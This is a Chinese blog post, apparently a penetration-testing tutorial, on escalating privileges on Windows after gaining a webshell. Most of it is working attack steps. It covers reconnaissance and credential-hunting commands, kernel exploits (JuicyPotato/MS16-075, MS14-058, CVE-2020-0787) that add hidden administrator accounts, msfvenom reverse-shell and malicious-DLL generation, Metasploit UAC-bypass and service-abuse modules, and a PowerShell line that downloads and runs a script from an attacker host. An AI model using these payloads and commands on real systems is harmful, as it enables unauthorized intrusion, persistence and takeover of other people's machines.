<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="云逸'bolg" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="云逸'bolg" type="application/atom+xml"><link rel="alternate" type="application/json" title="云逸'bolg" href="http://gyzero.shop/feed.json"/><link rel="preconnect" href="https://lf9-cdn-tos.bytecdntp.com"/><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"/><link rel="dns-prefetch" href="https://unpkg.com"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext"><link rel="stylesheet" href="/css/app.css?v=0.3.6"><script src="https://cdn.staticfile.org/vue/3.2.45/vue.global.prod.js"></script><link rel="canonical" href="http://gyzero.shop/2023/11/09/network-security/neiwang/Windows%E6%8F%90%E6%9D%83/Windows%E6%8F%90%E6%9D%83/"><title>Windows提权</title><meta name="generator" content="Hexo 6.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Windows提权</h1><div class="meta"><span class="item" title="创建时间：2023-11-09 20:28:50"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2023-11-09T20:28:50+08:00">2023-11-09</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>14k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>13 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">云逸'bolg</a></li></ul><ul class="right" id="rightNav"><li class="item theme" @click="changeThemeByBtn"><i class="ic" :class="{'i-sun': !themeStatus,'i-moon': themeStatus}"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/hg.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/zzz.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/%E5%A3%81%E7%BA%B8/45.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/99.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzeroselective-coloring-black-background-dark-background-anime-girls-simple-background-2223646-wallhere.com.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/%E5%A3%81%E7%BA%B8/48.jpg"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/network-security/" itemprop="item" rel="index" title="分类于网络安全"><span itemprop="name">网络安全<meta itemprop="position" content="0"/></span></a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/network-security/neiwang/" itemprop="item" rel="index" title="分类于内网安全"><span itemprop="name">内网安全<meta itemprop="position" content="1"/></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-CN"><link itemprop="mainEntityOfPage" href="http://gyzero.shop/2023/11/09/network-security/neiwang/Windows%E6%8F%90%E6%9D%83/Windows%E6%8F%90%E6%9D%83/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"/><meta itemprop="name" content="云逸"/><meta itemprop="description" content=", "/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="云逸'bolg"/></span><div class="body md" itemprop="articleBody"><h3 id="提权基础"><a class="markdownIt-Anchor" href="#提权基础">#</a> <span class="label">提权基础</span></h3>
<p>获取 webshell 后一般都是 www-data 权限权限很低所以要进行提权把权限提高为了后续渗透顺利</p>
<p>windows 的常用提权方法，主要分为漏洞提权、windwos 特性提权、第三方组件提权，数据库提权 ftp 提权 令牌窃取提权等姿势。</p>
<p>使用 Windows 命令提示符执行的，它将系统信息输出到名为 &quot;a.txt&quot; 的文件中，然后检查特定的 Windows 更新是否已安装。如果某些指定的更新未安装，它会输出一条消息表示这些更新未安装。最后，它会删除临时文件 &quot;a.txt</p>
<p>systeminfo&gt;a.txt&amp;(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&amp;del /f /q /a a.txt</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110225111274.png" alt="image-20231110225111274"></p>
<p>提权辅助:<span class="exturl" data-url="aHR0cHM6Ly9pLmhhY2tpbmc4LmNvbS90aXF1YW4v">https://i.hacking8.com/tiquan/</span></p>
<p>windows 漏洞集合<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL1NlY1dpa2kvd2luZG93cy1rZXJuZWwtZXhwbG9pdHM="> https://github.com/SecWiki/windows-kernel-exploits</span></p>
<h3 id="收集信息常用命令"><a class="markdownIt-Anchor" href="#收集信息常用命令">#</a> <span class="label">收集信息常用命令</span></h3>
<figure class="highlight text"><figcaption data-lang="text"></figcaption><table><tr><td data-num="1"></td><td><pre>ipconfig /all                                            --网卡配置</pre></td></tr><tr><td data-num="2"></td><td><pre>systeminfo                                               --系统补丁信息等</pre></td></tr><tr><td data-num="3"></td><td><pre>echo %PROCESSOR_ARCHITECTURE%                            --系统体系结构</pre></td></tr><tr><td data-num="4"></td><td><pre>wmic product get name,version                            --安装软件、版本、路径</pre></td></tr><tr><td data-num="5"></td><td><pre>wmic service list brief                                  --查询本机服务信息</pre></td></tr><tr><td data-num="6"></td><td><pre>tasklist -svc                                            --进程查看</pre></td></tr><tr><td data-num="7"></td><td><pre>schtasks /query /fo list /v                              --任务计划查询</pre></td></tr><tr><td data-num="8"></td><td><pre>net statistics workstation                               --开机时间</pre></td></tr><tr><td data-num="9"></td><td><pre>net user                                                 --查看用户</pre></td></tr><tr><td data-num="10"></td><td><pre>whoami /all                                              --SID等用户信息</pre></td></tr><tr><td data-num="11"></td><td><pre>net localgroup administrators                            --查看管理员组中的用户</pre></td></tr><tr><td data-num="12"></td><td><pre>net session                                              --会话查看</pre></td></tr><tr><td data-num="13"></td><td><pre>netstat -ano                                             --网络连接以及通过端口判断服务</pre></td></tr><tr><td data-num="14"></td><td><pre>net share                                                --共享</pre></td></tr><tr><td data-num="15"></td><td><pre>route print                                              --路由信息</pre></td></tr><tr><td data-num="16"></td><td><pre>arp -a                                                   --arp信息</pre></td></tr><tr><td data-num="17"></td><td><pre>cmdkey /l                                                --登录历史</pre></td></tr><tr><td data-num="18"></td><td><pre>hosts文件  Linux：/etc/hosts  Windows：c:\Windows\system32\drivers\etc\hosts</pre></td></tr><tr><td data-num="19"></td><td><pre>ipconfig  /displaydns                                    --dns缓存</pre></td></tr><tr><td data-num="20"></td><td><pre>net view                                                 --查看共享</pre></td></tr><tr><td data-num="21"></td><td><pre>dir /s /b "pass" "user" "config" "username." "password." --命令行查找敏感文件</pre></td></tr><tr><td data-num="22"></td><td><pre>findstr  /s /m "password" *.*                            --寻找包含密码字段的文件，如数据库密码文件</pre></td></tr><tr><td data-num="23"></td><td><pre>net user /domain                                         --查看域用户</pre></td></tr><tr><td data-num="24"></td><td><pre>net time /domain                                         --查看时间服务器（可能为DC）</pre></td></tr><tr><td data-num="25"></td><td><pre>net group "domain admins" /domain                        --查看域管理员</pre></td></tr><tr><td data-num="26"></td><td><pre>net group "domaincontrollers" /domain                    --查看域控制器</pre></td></tr></table></figure><p>net user 显示当前系统中的所有用户信息</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110133913521.png" alt="image-20231110133913521"></p>
<p>net user 31166 查看用户详细信息</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110134358877.png" alt="image-20231110134358877"></p>
<h4 id="whoami-all"><a class="markdownIt-Anchor" href="#whoami-all">#</a> <span class="label">whoami /all</span></h4>
<p>获取当前用户详细信息</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110134649977.png" alt="image-20231110134649977"></p>
<h4 id="hostname"><a class="markdownIt-Anchor" href="#hostname">#</a> <span class="label">hostname</span></h4>
<p>获取主机名</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110134745836.png" alt="image-20231110134745836"></p>
<h4 id="whoami-priv"><a class="markdownIt-Anchor" href="#whoami-priv">#</a> <span class="label">whoami /priv</span></h4>
<p>获取当前用户的安全特权</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110134929728.png" alt="image-20231110134929728"></p>
<h4 id="net-start"><a class="markdownIt-Anchor" href="#net-start">#</a> <span class="label">net start</span></h4>
<p>获取已经启动的 Windows 服务</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110135119067.png" alt="image-20231110135119067"></p>
<h4 id="systeminfo"><a class="markdownIt-Anchor" href="#systeminfo">#</a> <span class="label">systeminfo</span></h4>
<p>获取电脑打了那些补丁为之后提权打下基础</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110151656666.png" alt="image-20231110151656666"></p>
<h4 id="扫描可写可读目录"><a class="markdownIt-Anchor" href="#扫描可写可读目录">#</a> <span class="label">扫描可写可读目录</span></h4>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110151233596.png" alt="image-20231110151233596"></p>
<h3 id="windows常用提权"><a class="markdownIt-Anchor" href="#windows常用提权">#</a> <span class="label">windows 常用提权</span></h3>
<h4 id="ms16-075烂土豆提权"><a class="markdownIt-Anchor" href="#ms16-075烂土豆提权">#</a> <span class="label">MS16-075 烂土豆提权</span></h4>
<p>影响版本：Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012 等</p>
<p>下载网址</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL3Vrbm93c2VjL1N3ZWV0UG90YXRv">https://github.com/uknowsec/SweetPotato</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL3Vrbm93c2VjL0p1aWN5UG90YXRvL2Jsb2IvbWFpbi9KdWljeVBvdGF0by1zaGVsbGNvZGUvQmluL0p1aWN5UG90YXRvLmV4ZQ==">https://github.com/uknowsec/JuicyPotato/blob/main/JuicyPotato-shellcode/Bin/JuicyPotato.exe</span></p>
<p>找到了可读写目录上传 exe</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110153059031.png" alt="image-20231110153059031"></p>
<p>执行命令</p>
<p>C:\inetpub\wwwroot\dedecms\JuicyPotato_x64.exe net user yunyi2 1234567890 /add &amp;&amp; net localgroup administrators yunyi/add</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110160256590.png" alt="image-20231110160256590"></p>
<h4 id="ms14-058提权"><a class="markdownIt-Anchor" href="#ms14-058提权">#</a> <span class="label">MS14-058 提权</span></h4>
<p>具体而言，win32k.sys 是 Windows 子系统的一部分，负责窗口管理和屏幕输出。如果内核模块未正确处理内存中的对象，攻击者可能会通过利用这一漏洞来在内核模式中执行任意代码。成功利用此漏洞的攻击者可以在系统中运行具有更高权限的代码，进而执行一系列危险操作，如安装程序、查看、更改或删除数据，或者创建具有完全管理权限的新账户。</p>
<p>影响版本<br>
 Windows x64，包括 Windows 7 和 Windows Server 2008 R2 及以下</p>
<p>上传 exe 到可执行目录</p>
<p>whoami 看到已经是 nt authority\system</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110182725492.png" alt="image-20231110182725492"></p>
<p>64.exe “net user yunyi 123456 /add” 添加用户</p>
<p>64.exe &quot;net localgroup administrators yunyi /add&quot; 添加到管理员组</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110182123803.png" alt="image-20231110182123803"></p>
<p>远程端口连接成功</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110182617605.png" alt="image-20231110182617605"></p>
<h4 id="cve-2020-0787"><a class="markdownIt-Anchor" href="#cve-2020-0787">#</a> <span class="label">CVE-2020-0787</span></h4>
<p>影响版本</p>
<p>Windows 10 Version 1809 for ARM64-based Systems<br>
Windows Server 2008 for 32-bit Systems Service Pack 2<br>
Windows RT 8.1<br>
Windows 8.1 for x64-based systems<br>
Windows 8.1 for 32-bit systems<br>
Windows 7 for x64-based Systems Service Pack 1<br>
Windows 7 for 32-bit Systems Service Pack 1<br>
Windows Server 2016 (Server Core installation)<br>
Windows Server 2016<br>
Windows 10 Version 1607 for x64-based Systems<br>
Windows 10 Version 1607 for 32-bit Systems<br>
Windows 10 for x64-based Systems<br>
Windows 10 for 32-bit Systems<br>
Windows Server, version 1903 (Server Core installation)<br>
Windows 10 Version 1903 for ARM64-based Systems<br>
Windows 10 Version 1903 for x64-based Systems<br>
Windows 10 Version 1903 for 32-bit Systems<br>
Windows 10 Version 1709 for ARM64-based Systems<br>
Windows 10 Version 1709 for x64-based Systems<br>
Windows 10 Version 1709 for 32-bit Systems<br>
Windows Server, version 1909 (Server Core installation)<br>
Windows 10 Version 1909 for ARM64-based Systems<br>
Windows 10 Version 1909 for x64-based Systems<br>
Windows 10 Version 1909 for 32-bit Systems<br>
Windows Server 2019 (Server Core installation)<br>
Windows Server 2019<br>
Windows Server 2012 R2 (Server Core installation)<br>
Windows Server 2012 R2<br>
Windows Server 2012 (Server Core installation)<br>
Windows Server 2012<br>
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)<br>
Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)<br>
Windows Server 2008 for x64-based Systems Service Pack 2<br>
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)<br>
Windows 10 Version 1809 for x64-based Systems<br>
Windows 10 Version 1809 for 32-bit Systems<br>
Windows 10 Version 1803 for ARM64-based Systems<br>
Windows Server, version 1803 (Server Core Installation)<br>
Windows 10 Version 1803 for x64-based Systems<br>
Windows 10 Version 1803 for 32-bit Systems</p>
<p>脚本地址</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2Nid2FuZzUwNS9DVkUtMjAyMC0wNzg3LUVYUC1BTEwtV0lORE9XUy1WRVJTSU9OL3JlbGVhc2VzL3RhZy8x">https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/tag/1</span></p>
<p>要求上桌面执行，会弹出系统权限的 cmd</p>
<p>把 exe 上传后切换上面创建的用户登陆桌面</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110185051791.png" alt="image-20231110185051791"></p>
<p>执行后弹出 cmd</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110185214126.png" alt="image-20231110185214126"></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110185227277.png" alt="image-20231110185227277"></p>
<h3 id="msf利用"><a class="markdownIt-Anchor" href="#msf利用">#</a> <span class="label">msf 利用</span></h3>
<p>先生成一个木马文件</p>
<p>msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.27.11 lport=8989-f exe &gt;/vs.exe</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110211226995.png" alt="image-20231110211226995"></p>
<p>msf 打开监听</p>
<p>use exploit/multi/handler</p>
<p>set payload windows/meterpreter/reverse_tcp</p>
<p>set lhost 192.168.27.11</p>
<p>set lport 8989</p>
<p>exploit</p>
<p>用 webshell 上传到受害机执行木马文件</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110213027928.png" alt="image-20231110213027928"></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110213439218.png" alt="image-20231110213439218"></p>
<p>跟之前一样查看打了那些补丁</p>
<p>输入 shell 获取 cmd 使用 systeminfo 获取到信息后跟之前一样去找可以用的提权</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110214317729.png" alt="image-20231110214317729"></p>
<p>用 background 命令把会话放在后台，可以用 session 查看已建立的会话信息</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110214725591.png" alt="image-20231110214725591"></p>
<p>search ms14_058 查找漏洞信息</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110214943295.png" alt="image-20231110214943295"></p>
<p>use exploit/windows/local/ms14_058_track_popup_menu</p>
<p>show options 查看利用要求</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110215511454.png" alt="image-20231110215511454"></p>
<p>设置会话 id 刚才看的是 session 2 所以设置为 2</p>
<p>set session 2</p>
<p>然后 exploit 执行</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110220237813.png" alt="image-20231110220237813"></p>
<p>use exploit/windows/local/ms16_075_reflection_juicy</p>
<p>ms14_058 没有成功所以换了 ms16 _075 成功获取 system 权限</p>
<p>切换 shell 添加用户并加入管理员</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110221425934.png" alt="image-20231110221425934"></p>
<p>维权</p>
<p>ps 列出进程</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110221951490.png" alt="image-20231110221951490"></p>
<p>migrate 1184</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231110222507771.png" alt="image-20231110222507771"></p>
<h3 id="uac提权"><a class="markdownIt-Anchor" href="#uac提权">#</a> <span class="label">UAC 提权</span></h3>
<p>用户账户控制（UAC）是 Windows 操作系统中的一项安全特性。它旨在帮助防止未经授权的对计算机的更改。当一个程序尝试执行需要管理员权限的更改时，UAC 会通知用户并在允许更改之前征得用户的确认。</p>
<p>UAC 通过确保只有在用户明确同意的情况下才执行管理操作，有助于降低未经授权的更改和恶意软件安装的风险。这样，即使用户以管理员身份登录，他们仍然需要确认他们意图执行可能对系统造成影响的某些操作。</p>
<p>前提：已获取目标本地用户权限</p>
<p>上传 msf 木马执行</p>
<p>现在为普通用户权限</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111102136583.png" alt="image-20231111102136583"></p>
<p>search 搜索一下 UAC 利用模块</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111100615934.png" alt="image-20231111100615934"></p>
<p>使用 exploit/windows/local/bypassuac 模块</p>
<p>set session 5</p>
<p>run</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111102853388.png" alt="image-20231111102853388"></p>
<p>执行成功过后再使用 getsystem</p>
<p>getuid 查看已经是 system 权限</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111102946311.png" alt="image-20231111102946311"></p>
<h3 id="windows系统配置错误提权"><a class="markdownIt-Anchor" href="#windows系统配置错误提权">#</a> <span class="label">windows 系统配置错误提权</span></h3>
<h4 id="系统服务权限配置错误"><a class="markdownIt-Anchor" href="#系统服务权限配置错误">#</a> <span class="label">系统服务权限配置错误</span></h4>
<p>Windows 在系统启动时，会伴随着一些高权服务启动 (windows 服务是以 system 权限运行的) 如果某些服务存在一些漏洞，那么就能够借此服务进行权限劫持，例如 DLL 劫持</p>
<p>如果一个低权限用户对系统服务调用的可执行文件有写权限，他们可以替换该文件，并在系统启动时获取控制权限。尽管 Windows 服务以 system 权限运行，其文件夹、文件和注册表项受到强制访问控制的保护，但在某些情况下，仍可能存在一些缺乏有效保护的服务。</p>
<p><span class="label">Metasploit</span></p>
<p>上线木马当前是 iis 权限</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111112119228.png" alt="image-20231111112119228"></p>
<p>background 把会话放在后台</p>
<p>切换到 use exploit/windows/local/service_permissions 攻击模块</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111112359457.png" alt="image-20231111112359457"></p>
<p>set session 4</p>
<p>设置为 session 4</p>
<p>exploit 执行</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111112807154.png" alt="image-20231111112807154"></p>
<p><span class="label">PrivescCheck</span></p>
<p>脚本地址<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2l0bTRuL1ByaXZlc2NDaGVjaw=="> https://github.com/itm4n/PrivescCheck</span></p>
<p>列举共同 Windows 配置问题  ，可以利用当地的权限升级</p>
<p>使用 1:   基本的使用情况</p>
<pre><code>powershell -ep bypass -c &quot;. .\PrivescCheck.ps1; Invoke-PrivescCheck&quot;
</code></pre>
<p>远程使用</p>
<pre><code>powershell -nop -exec bypass -c &quot;IEX (New-Object 
Net.WebClient).DownloadString('http://192.168.27.11/PrivescCheck.ps1'); Invoke-PrivescCheck&quot;
</code></pre>
<p><span class="label">PowerUp</span></p>
<p>导入并执行脚本 powershell.exe -exec bypass -command “&amp;{Import-Module .\PowerUp.ps1;Invoke-AllChecks}”</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111173012800.png" alt="image-20231111173012800"></p>
<p>StartName    : LocalSystem</p>
<p>AbuseFunction  : Install-ServiceBinary -ServiceName ‘MongoDB’</p>
<p>利用 Install-ServiceBinary 模块，通过 PowerUp 利用该处权限配置不当可直接添加管理员用户</p>
<p>添加管理员</p>
<p>powershell.exe -exec bypass -command “&amp;{Import-Module .\PowerUp.ps1;Install-ServiceBinary -ServiceName ‘MongoDB’ -UserName yunyi4 -Password admin}”</p>
<p>服务被重启或者计算机重启后就可以添加成功了</p>
<h4 id="不带引号的服务路径"><a class="markdownIt-Anchor" href="#不带引号的服务路径">#</a> <span class="label">不带引号的服务路径</span></h4>
<p>当 Windows 服务运行时，会发生以下两种情况之一。如果给出了可执行文件，并且引用了完整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。</p>
<p>使用命令查看服务器存在空格，路径可写 即存在漏洞</p>
<p>wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\” |findstr /i /v “”&quot;</p>
<p>例如</p>
<p>C:\Program Files<br>
(x86)\2345Soft\2345Pic\protect\Pic_2345Svc.exe    Auto</p>
<p>这种存在空格</p>
<p>msf 生成一个 program.exe 放在 c 应用重启即可上线</p>
<h3 id="dll劫持提权"><a class="markdownIt-Anchor" href="#dll劫持提权">#</a> <span class="label">DLL 劫持提权</span></h3>
<p>查看应用进程找数字签名或者未知文件</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111191157012.png" alt="image-20231111191157012"></p>
<p>生成一个名字一样的 dll 并且替换</p>
<p>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.27.11 lport=6789 -f dll &gt; /root/2345MgrDLL.dll</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111191517160.png" alt="image-20231111191517160"></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111191909318.png" alt="image-20231111191909318"></p>
<p>msf 上线</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/win%E6%8F%90%E6%9D%83/image-20231111192614857.png" alt="image-20231111192614857"></p>
</div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于</span><time title="修改时间：2023-11-11 19:39:21" itemprop="dateModified" datetime="2023-11-11T19:39:21+08:00">2023-11-11</time></span></div><div class="reward"><button><i class="ic i-heartbeat"></i>赞赏</button><p>请我喝[茶]~(￣▽￣)~*</p><div id="qr"><div><img data-src="/assets/wechatpay.png" alt="云逸 微信支付"/><p>微信支付</p></div><div><img data-src="/assets/alipay.png" alt="云逸 支付宝"/><p>支付宝</p></div></div></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>云逸<i class="ic i-at"><em>@</em></i>云逸'bolg</li><li class="link"><strong>本文链接：</strong><a href="http://gyzero.shop/2023/11/09/network-security/neiwang/Windows%E6%8F%90%E6%9D%83/Windows%E6%8F%90%E6%9D%83/" title="Windows提权">http://gyzero.shop/2023/11/09/network-security/neiwang/Windows提权/Windows提权/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2023/11/09/%E6%BC%8F%E6%B4%9E/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="prev" itemprop="url" data-background-image="https:&#x2F;&#x2F;tuchuang-1309689803.cos.ap-nanjing.myqcloud.com&#x2F;gyzeroselective-coloring-black-background-dark-background-anime-girls-simple-background-2223646-wallhere.com.jpg" title="文件上传漏洞"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>基础漏洞</span><h3>文件上传漏洞</h3></a></div><div class="item right"><a href="/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/" rel="next" itemprop="url" data-background-image="https:&#x2F;&#x2F;tuchuang-1309689803.cos.ap-nanjing.myqcloud.com&#x2F;gyzero&#x2F;hg.jpg" title="linux提权"><span class="type">下一篇</span><span class="category"><i class="ic i-flag"></i>内网安全</span><h3>linux提权</h3></a></div></div></div><div id="sidebar"><div 